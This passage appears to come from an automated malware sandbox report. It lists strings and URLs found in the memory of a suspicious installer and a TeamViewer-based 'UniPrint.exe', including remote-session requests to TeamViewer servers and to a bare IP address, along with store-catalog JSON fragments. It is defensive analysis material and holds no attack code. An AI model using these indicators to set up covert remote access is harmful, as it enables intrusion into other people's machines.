"RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/EM
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=100000012
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001K
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=1000
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1014947497.00000000057B2000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002.
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=100000023321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000003.714775003.00000000057B2000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002Z
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGate
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGatepzm
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate
Source: UniPrint.exe, 00000005.00000002.1072952284.0000000000AE8000.00000004.00000020.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate:%
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGateZ
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGatellow
Source: wogZe27GBB.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wogZe27GBB.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 00000010.00000002.817773606.00000217C6F00000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wogZe27GBB.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmpString found in binary or memory: http://crl.verisign.co
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmpString found in binary or memory: http://crl.verisign.corl0
Source: wogZe27GBB.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wogZe27GBB.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wogZe27GBB.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wogZe27GBB.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wogZe27GBB.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://go.teamviewer.comn0
Source: UniPrint.exe, 00000005.00000003.710224733.00000000057D9000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001;
Source: UniPrint.exe, 00000005.00000003.709879277.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001ndows.Phot
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001s
Source: UniPrint.exe, 00000005.00000002.1073157453.0000000000B65000.00000004.00000020.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002u
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=100000026
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.710194245.00000000057D4000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=100000023v
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713534320.0000000005721000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000002.1073179417.0000000000B68000.00000004.00000020.sdmpString found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5Mko
Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmpString found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6s
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713565888.000000000576A000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713161991.00000000057D0000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeq
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr13.teamv
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr13.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=2
Source: wogZe27GBB.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wogZe27GBB.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wogZe27GBB.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: wogZe27GBB.exeString found in binary or memory: http://ocsp.digicert.com0O
Source: wogZe27GBB.exeString found in binary or memory: http://ocsp.sectigo.com0
Source: UniPrint.exe, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.TeamViewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.TeamViewer.com/download
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.TeamViewer.com/help
Source: wogZe27GBB.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
Source: nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000010.00000003.794457434.00000217C6F81000.00000004.00000001.sdmpString found in binary or memory: https://displaycatalog.m(
